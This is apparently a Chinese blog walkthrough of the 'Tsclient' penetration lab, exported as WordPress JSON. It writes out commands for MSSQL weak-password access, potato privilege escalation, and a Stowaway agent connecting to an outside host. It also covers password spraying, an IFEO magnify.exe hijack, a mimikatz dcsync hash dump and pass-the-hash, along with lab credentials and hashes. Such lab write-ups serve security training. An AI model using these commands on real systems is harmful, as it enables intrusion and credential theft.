{"id":543,"date":"2024-11-30T11:56:50","date_gmt":"2024-11-30T03:56:50","guid":{"rendered":"http:\/\/www.s1mh0.cn\/blog\/?p=543"},"modified":"2024-12-13T21:20:42","modified_gmt":"2024-12-13T13:20:42","slug":"cqyj_tsclient","status":"publish","type":"post","link":"https:\/\/www.s1mh0.cn\/blog\/index.php\/2024\/11\/30\/cqyj_tsclient\/","title":{"rendered":"\u6625\u79cb\u4e91\u5883-Tsclient"},"content":{"rendered":"

Tsclient<\/h2>\n

\u6d89\u53ca\u7684\u77e5\u8bc6\u70b9<\/p>\n

mssql\u914d\u5408\u751c\u571f\u8c46\u63d0\u6743\nCS\u9a6c\u4e0a\u7ebf + session\u8fdb\u7a0b\u6ce8\u5165 + IPC\u76d8\u7b26\u5171\u4eab\nrdesktop + \u8bbe\u7acb\u5171\u4eab\u6587\u4ef6\u5939\nsmbpasswd.py\u4fee\u6539\u7528\u6237\u5bc6\u7801\n\u6620\u50cf\u52ab\u6301\n\u54c8\u5e0c\u4f20\u9012<\/code><\/pre>\n
flag1<\/h3>\n
fscan\u626b\u51famssql\u5f31\u5bc6\u7801<\/p>\n
fscan.exe -h 39.99.150.186\n\nstart infoscan\n39.99.150.186:135 open\n39.99.150.186:80 open\n39.99.150.186:139 open\n39.99.150.186:1433 open\n[*] alive ports len is: 4\nstart vulscan\n[*] NetInfo\n[*]39.99.150.186\n   [->]WIN-WEB\n   [->]172.22.8.18\n   [->]2001:0:348b:fb58:149a:265d:d89c:6945\n[*] WebTitle http:\/\/39.99.150.186      code:200 len:703    title:IIS Windows Server\n[+] mssql 39.99.150.186:1433:sa 1qaz!QAZ\n\u5df2\u5b8c\u6210 4\/4\n[*] \u626b\u63cf\u7ed3\u675f,\u8017\u65f6: 50.4953851s<\/code><\/pre>\n
mssql\u4e00\u822c\u9700\u8981\u914d\u5408\u63d0\u6743<\/p>\n
\"cqyj_tsclient1\"<\/p>\n
\u4f20\u751c\u571f\u8c46\u63d0\u6743\u6210system<\/p>\n
\"cqyj_tsclient2\"<\/p>\n
\u63a5\u7740\u4ee5system\u6743\u9650\u53cd\u5411\u4ee3\u7406\u4e0a\u7ebf<\/p>\n
\"cqyj_tsclient3\"<\/p>\n
administrator\u4e0b\u5f97\u5230flag1<\/p>\n
\"cqyj_tsclient4\"<\/p>\n
\"cqyj_tsclient5\"<\/p>\n
flag{94f6cf72-2eef-4305-a633-49de162620a7}<\/code><\/pre>\n
flag2<\/h3>\n
\u63d0\u793a\u8981\u5173\u6ce8\u7528\u6237sessions\uff0c\u4f20CS\u9a6c\u4e0a\u7ebf<\/p>\n
\"cqyj_tsclient6\"<\/p>\n
\u53ef\u4ee5dump\u4e00\u4e0b\u7528\u6237hash<\/p>\n
\"cqyj_tsclient7\"<\/p>\n
\u63a5\u7740\u4f7f\u7528quser<\/code>\u6216\u8005qwinsta<\/code>\u67e5\u770b\u5728\u7ebf\u7528\u6237<\/p>\n
quser<\/code>\uff1a\u663e\u793a\u6709\u5173\u8fdc\u7a0b\u684c\u9762\u4f1a\u8bdd\u4e3b\u673a\u670d\u52a1\u5668\u4e0a\u7684\u7528\u6237\u4f1a\u8bdd\u7684\u4fe1\u606f\u3002 \u53ef\u4ee5\u4f7f\u7528\u6b64\u547d\u4ee4\u6765\u67e5\u660e\u7279\u5b9a\u7528\u6237\u662f\u5426\u5df2\u767b\u5f55\u5230\u7279\u5b9a\u7684\u8fdc\u7a0b\u684c\u9762\u4f1a\u8bdd\u4e3b\u673a\u670d\u52a1\u5668\u3002 \u6b64\u547d\u4ee4\u8fd4\u56de\u4ee5\u4e0b\u4fe1\u606f\uff1a<\/p>\n
    \n
  • \u7528\u6237\u7684\u540d\u79f0<\/li>\n
  • \u8fdc\u7a0b\u684c\u9762\u4f1a\u8bdd\u4e3b\u673a\u670d\u52a1\u5668\u4e0a\u7684\u4f1a\u8bdd\u540d\u79f0<\/li>\n
  • \u4f1a\u8bdd ID<\/li>\n
  • \u4f1a\u8bdd\u7684\u72b6\u6001\uff08\u6d3b\u52a8\u6216\u65ad\u5f00\u8fde\u63a5\uff09<\/li>\n
  • \u7a7a\u95f2\u65f6\u95f4\uff08\u4f1a\u8bdd\u4e2d\u81ea\u4e0a\u6b21\u51fb\u952e\u6216\u9f20\u6807\u79fb\u52a8\u4ee5\u6765\u7ecf\u8fc7\u7684\u5206\u949f\u6570\uff09<\/li>\n
  • \u7528\u6237\u767b\u5f55\u7684\u65e5\u671f\u548c\u65f6\u95f4<\/li>\n<\/ul>\n
    qwinsta<\/code>\uff1a\u663e\u793a\u8fdc\u7a0b\u684c\u9762\u4f1a\u8bdd\u4e3b\u673a\u670d\u52a1\u5668\u4e0a\u7684\u4f1a\u8bdd\u7684\u76f8\u5173\u4fe1\u606f\u3002 \u8be5\u5217\u8868\u4e0d\u4ec5\u5305\u542b\u6d3b\u52a8\u4f1a\u8bdd\u7684\u76f8\u5173\u4fe1\u606f\uff0c\u8fd8\u5305\u62ec\u670d\u52a1\u5668\u8fd0\u884c\u7684\u5176\u4ed6\u4f1a\u8bdd\u7684\u76f8\u5173\u4fe1\u606f\u3002<\/p>\n
    \"cqyj_tsclient8\"<\/p>\n
    \u5bf9john\u7528\u6237\u6ce8\u5165\u8fdb\u7a0b\u4e0a\u7ebf\uff08\u95ee\u9898\uff1a\u80fd\u5426\u6ce8\u5165\u5230john\u7528\u6237\u7684\u5176\u4ed6\u8fdb\u7a0b\uff09<\/p>\n
    \"cqyj_tsclient9\"<\/p>\n
    net use<\/code>\uff1a\u4ee5\u8fde\u63a5\uff0c\u5220\u9664\uff0c\u914d\u7f6e\u4e0e\u5171\u4eab\u8d44\u6e90(\u5982\u6620\u5c04\u9a71\u52a8\u5668\uff0c\u7f51\u7edc\u8d44\u6e90\u548c\u7f51\u7edc\u6253\u5370\u673a)\u7684\u8fde\u63a5\u3002<\/p>\n
    \u53ef\u4ee5\u770b\u5230\u5176\u8fdc\u7a0b\u5171\u4eab\u4e86c\u76d8<\/p>\n
    \"cqyj_tsclient10\"<\/p>\n
    \u67e5\u770bc\u76d8\u4e0b\u7684credential.txt\u6587\u4ef6\uff0c\u5f97\u5230\u4e00\u4e2a\u57df\u7528\u6237\u8d26\u5bc6\uff0c\u4ee5\u53ca\u6620\u50cf\u52ab\u6301\u7684\u63d0\u793a<\/p>\n
    \"cqyj_tsclient11\"<\/p>\n
    xiaorang.lab\\Aldrich:Ald@rLMWuy7Z!#<\/code><\/pre>\n
    \u67e5\u770b\u9776\u673aip<\/p>\n
    \"cqyj_tsclient12\"<\/p>\n
    \u4f20fscan\u626b172.22.8.1\/24<\/code>\u6bb5<\/p>\n
    C:\/Users\/Public\/fscan.exe -h 172.22.8.1\/24 -o res.txt\n\nstart infoscan\n(icmp) Target 172.22.8.18     is alive\n(icmp) Target 172.22.8.15     is alive\n(icmp) Target 172.22.8.31     is alive\n(icmp) Target 172.22.8.46     is alive\n[*] Icmp alive hosts len is: 4\n172.22.8.15:88 open\n172.22.8.46:445 open\n172.22.8.18:1433 open\n172.22.8.31:445 open\n172.22.8.15:445 open\n172.22.8.18:445 open\n172.22.8.46:139 open\n172.22.8.31:139 open\n172.22.8.15:139 open\n172.22.8.46:135 open\n172.22.8.18:139 open\n172.22.8.31:135 open\n172.22.8.15:135 open\n172.22.8.18:135 open\n172.22.8.46:80 open\n172.22.8.18:80 open\n[*] alive ports len is: 16\nstart vulscan\n[*] NetInfo\n[*]172.22.8.18\n   [->]WIN-WEB\n   [->]172.22.8.18\n   [->]2001:0:348b:fb58:149a:265d:d89c:6945\n[*] NetInfo\n[*]172.22.8.46\n   [->]WIN2016\n   [->]172.22.8.46\n[*] NetInfo\n[*]172.22.8.31\n   [->]WIN19-CLIENT\n   [->]172.22.8.31\n[*] NetBios 172.22.8.31     XIAORANG\\WIN19-CLIENT\n[*] NetBios 172.22.8.15     [+] DC:XIAORANG\\DC01\n[*] NetInfo\n[*]172.22.8.15\n   [->]DC01\n   [->]172.22.8.15\n[*] NetBios 172.22.8.46     WIN2016.xiaorang.lab                Windows Server 2016 Datacenter 14393\n[*] WebTitle http:\/\/172.22.8.46        code:200 len:703    title:IIS Windows Server\n[*] WebTitle http:\/\/172.22.8.18        code:200 len:703    title:IIS Windows Server\n[+] mssql 172.22.8.18:1433:sa 1qaz!QAZ\n\u5df2\u5b8c\u6210 16\/16\n[*] \u626b\u63cf\u7ed3\u675f,\u8017\u65f6: 10.0636783s<\/code><\/pre>\n
    \u5f97\u5230\u4ee5\u4e0b\u4fe1\u606f\uff1a<\/p>\n
      \n
    • 172.22.1.46<\/code>\u4e3b\u673a\uff0c\u64cd\u4f5c\u7cfb\u7edfWIN2016<\/li>\n
    • 172.22.1.31<\/code>\u4e3b\u673a\uff0c\u64cd\u4f5c\u7cfb\u7edfWIN19-CLIENT<\/li>\n
    • 172.22.8.15<\/code>\u4e3a\u57df\u63a7<\/li>\n<\/ul>\n
      Stowaway\u642d\u4ee3\u7406<\/p>\n
      C:\/Users\/Public\/windows_x64_agent.exe -c 8.138.89.236:9010 -s 123 --reconnect 8<\/code><\/pre>\n
      \"cqyj_tsclient13\"<\/p>\n
      \u5bf9\u5185\u7f51\u7f51\u6bb5\u4e3b\u673a\u505a\u5bc6\u7801\u55b7\u6d12\uff0c\u547d\u4e2d\u7684\u4e5f\u90fd\u662ffscan\u626b\u51fa\u6765\u5b58\u6d3b\u7684\u4e3b\u673a<\/p>\n
      vim \/etc\/proxychains4.conf\nproxychains4 crackmapexec smb 172.22.8.1\/24 -u Aldrich -p 'Ald@rLMWuy7Z!#' -d xiaorang.lab 2>\/dev\/null<\/code><\/pre>\n
      \"cqyj_tsclient14\"<\/p>\n
      SMB         172.22.8.46     445    WIN2016          [*] Windows Server 2016 Datacenter 14393 x64 (name:WIN2016) (domain:xiaorang.lab) (signing:False) (SMBv1:True)\nSMB         172.22.8.18     445    WIN-WEB          [*] Windows Server 2016 Datacenter 14393 x64 (name:WIN-WEB) (domain:xiaorang.lab) (signing:False) (SMBv1:True)\nSMB         172.22.8.15     445    DC01             [*] Windows 10.0 Build 20348 x64 (name:DC01) (domain:xiaorang.lab) (signing:True) (SMBv1:False)\nSMB         172.22.8.31     445    WIN19-CLIENT     [*] Windows 10.0 Build 17763 x64 (name:WIN19-CLIENT) (domain:xiaorang.lab) (signing:False) (SMBv1:False)<\/code><\/pre>\n
      \u767b\u5f55172.22.8.15\u4e3b\u673a\u663e\u793a\u5bc6\u7801\u8fc7\u671f<\/p>\n
      \"cqyj_tsclient15\"<\/p>\n
      proxychains4  rdesktop 172.22.8.31 -u Aldrich -d xiaorang.lab -p 'Ald@rLMWuy7Z!#'<\/code><\/pre>\n
      \u5728kali\u7528rdesktop\u8fde\u63a5\u5e76\u4fee\u6539\u5bc6\u7801\uff0c\u4f46\u662f\u8fd4\u56dewindows\u8fdeRDP\u8fd8\u662f\u5931\u8d25\uff0c\u602a<\/p>\n
      \"cqyj_tsclient16\"<\/p>\n
      \"cqyj_tsclient17\"<\/p>\n
      \u6216\u8005\u7528impacket\u91cc\u7684smbpasswd.py\u4fee\u6539\u5bc6\u7801<\/p>\n
      proxychains4 python3 smbpasswd.py xiaorang.lab\/Aldrich:'Ald@rLMWuy7Z!#'@172.22.8.15 -newpass 'qwe@123'<\/code><\/pre>\n
      rdesktop\u8fde\u63a5172.22.8.46\u673a\u5668\uff0c\u5e76\u5728\/root\/Desktop\/simho<\/code>\u4e0b\u8bbe\u7acb\u5171\u4eab\u6587\u4ef6\u5939\uff0c\u65b9\u4fbf\u6587\u4ef6\u4e92\u4f20<\/p>\n
      proxychains4 rdesktop 172.22.8.46 -u Aldrich -d xiaorang.lab -p 'qwe@123' -r disk:share=\/root\/Desktop\/simho<\/code><\/pre>\n
      \u6620\u50cf\u52ab\u6301\u63d0\u793a\uff0c\u4f7f\u7528\u8fd9\u6761\u547d\u4ee4\u53ef\u4ee5\u770b\u5230\u767b\u5f55\u7528\u6237\u90fd\u6709\u4fee\u6539\u6ce8\u518c\u8868\u7684\u6743\u9650<\/p>\n
      get-acl -path "HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options" | fl *<\/code><\/pre>\n
      \"cqyj_tsclient18\"<\/p>\n
      \u4e3b\u8981\u662f\u8fd9\u4e00\u9879<\/p>\n
      NT AUTHORITY\\Authenticated Users Allow  SetValue, CreateSubKey, ReadKey\n\n# \u8868\u793a\u6240\u6709\u7ecf\u8fc7\u8eab\u4efd\u9a8c\u8bc1\u7684\u7528\u6237\uff08\u5373\u767b\u5f55\u5230\u7cfb\u7edf\u7684\u7528\u6237\uff09\u88ab\u5141\u8bb8\u5bf9\u8be5\u6ce8\u518c\u8868\u9879\u6267\u884c\u4ee5\u4e0b\u64cd\u4f5c\uff1a\u8bbe\u7f6e\u503c\uff08SetValue\uff09\u3001\u521b\u5efa\u5b50\u9879\uff08CreateSubKey\uff09\u548c\u8bfb\u53d6\u952e\uff08ReadKey\uff09\u3002<\/code><\/pre>\n
      \u56e0\u6b64\u53ef\u4ee5\u4fee\u6539\u6ce8\u518c\u8868\u6620\u50cf\u52ab\u6301\uff0c\u4f7f\u7528\u653e\u5927\u955c\u8fdb\u884c\u63d0\u6743<\/p>\n
      REG ADD "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\magnify.exe" \/v Debugger \/t REG_SZ \/d "C:\\windows\\system32\\cmd.exe"<\/code><\/pre>\n
      \"cqyj_tsclient19\"<\/p>\n
      \u63a5\u7740\u9501\u5b9a\u7528\u6237\uff0c\u70b9\u51fb\u53f3\u4e0b\u89d2\u653e\u5927\u955c\u5373\u53ef\u63d0\u6743\u5230system\u6743\u9650<\/p>\n
      \"cqyj_tsclient20\"<\/p>\n
      \u6253\u5370flag2<\/p>\n
      \"cqyj_tsclient21\"<\/p>\n
      flag{f704f8b4-745e-41f5-8198-848a271c8748}<\/code><\/pre>\n
      flag3<\/h3>\n
      \u53ef\u4ee5\u901a\u8fc7net group "domain admins" \/domain<\/code>\u547d\u4ee4\u6216bloodhound\u6536\u96c6\u4fe1\u606f\uff0c\u53d1\u73b0172.22.1.46\u4e3b\u673a\uff08\u5373win2016\uff09\u662f\u57df\u7ba1\u7406\u5458\uff0c\u901a\u8fc7\u5171\u4eab\u6587\u4ef6\u5939\u4f20\u5165mimikatz\u6765dump\u6240\u6709\u7528\u6237hash<\/p>\n
      cd c:\\Users\\Aldrich\\Desktop\\123123\nmimikatz.exe "lsadump::dcsync \/domain:xiaorang.lab \/all \/csv" exit\n\nmimikatz(commandline) # lsadump::dcsync \/domain:xiaorang.lab \/all \/csv\n[DC] 'xiaorang.lab' will be the domain\n[DC] 'DC01.xiaorang.lab' will be the DC server\n[DC] Exporting domain 'xiaorang.lab'\n[rpc] Service  : ldap\n[rpc] AuthnSvc : GSS_NEGOTIATE (9)\n502     krbtgt  3ffd5b58b4a6328659a606c3ea6f9b63        514\n1000    DC01$   d66ef71e4c4e524325ca09cf385674e1        532480\n500     Administrator   2c9d81bdcf3ec8b1def10328a7cc2f08        512\n1103    WIN2016$        d998fc9892e7b173007c8b5f5e03f14b        16781312\n1104    WIN19-CLIENT$   3471326709b2effd6ff0661804cf737f        16781312\n1105    Aldrich 933a9b5b44dab4530d86d83a6b47b7d1        512<\/code><\/pre>\n
      \"cqyj_tsclient22\"<\/p>\n
      \u63a5\u7740\u901a\u8fc7\u54c8\u5e0c\u4f20\u9012\u767b\u5f55\u57df\u63a7\u673a\uff0c\u5f97\u5230\u6700\u540e\u4e00\u4e2aflag<\/p>\n
      proxychains4 crackmapexec smb 172.22.8.15 -u administrator -H2c9d81bdcf3ec8b1def10328a7cc2f08 -d xiaorang.lab -x "type c:\\users\\administrator\\flag\\flag03.txt"<\/code><\/pre>\n
      \"cqyj_tsclient23\"<\/p>\n
      proxychains4 impacket-smbexec -hashes :2c9d81bdcf3ec8b1def10328a7cc2f08 xiaorang.lab\/administrator@172.22.8.15 -codec gbk<\/code><\/pre>\n
      \"cqyj_tsclient24\"<\/p>\n
      flag{d2edf678-4ff7-4ccb-93a3-313df2222a79}<\/code><\/pre>\n
      <\/div>","protected":false},"excerpt":{"rendered":"
      Tsclient \u6d89\u53ca\u7684\u77e5\u8bc6\u70b9 mssql\u914d\u5408\u751c\u571f\u8c46\u63d0\u6743 CS\u9a6c\u4e0a\u7ebf + session\u8fdb\u7a0b\u6ce8\u5165 + IPC\u76d8 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-543","post","type-post","status-publish","format-standard","hentry","category-pentesting"],"views":512,"_links":{"self":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/543","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=543"}],"version-history":[{"count":3,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/543\/revisions"}],"predecessor-version":[{"id":564,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/543\/revisions\/564"}],"wp:attachment":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=543"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=543"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=543"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}